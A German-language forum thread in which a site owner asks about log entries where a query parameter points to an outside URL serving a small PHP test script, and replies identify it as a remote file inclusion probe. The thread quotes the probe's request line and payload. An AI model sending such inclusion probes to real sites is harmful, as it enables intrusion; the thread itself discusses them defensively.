Hallo,

ich entdecke in den Logfiles des öfteren Einträge wie diesen hier:


GET /index.html?q=http://www.felixtorresycia.com/admin/correo/enaq/ecib/

Wenn man die fremde URL aufruft, findet man ein kurzes PHP Script in Klarschrift:
<?php echo md5("just_a_test");?>

Muss ich mir da Sorgen machen?

Und wenn ja, was mach ich da gegen?

Schönen Dank vorab.

da probiert jemand über q ein php-script zu übergeben, dass dein script dann hoffentlich ausführt....

was du dagegen machst? nichts, wenn du dir sicher bist, dass dein script keine solchen lücken hat

http://

da am besten mal nach "GET" schauen

jeronimo: Vielen Dank, die GET Methode ist mir schon bekannt,
es ging mir vielmehr um das Unterschieben eines php scriptes und die Deutung desselben als
Sicherheitslücke und Vorbote eines wie auch immer gearteten Angriffs.

nitrit: Danke, ich werd das unter Beobachtung halten.

scheint eine test datei die bei md5 bei einer Verbindung verwendet und abgelegt wird - wie die datei heißt ist vermutlich konfigurationsabhängig . . .

MD5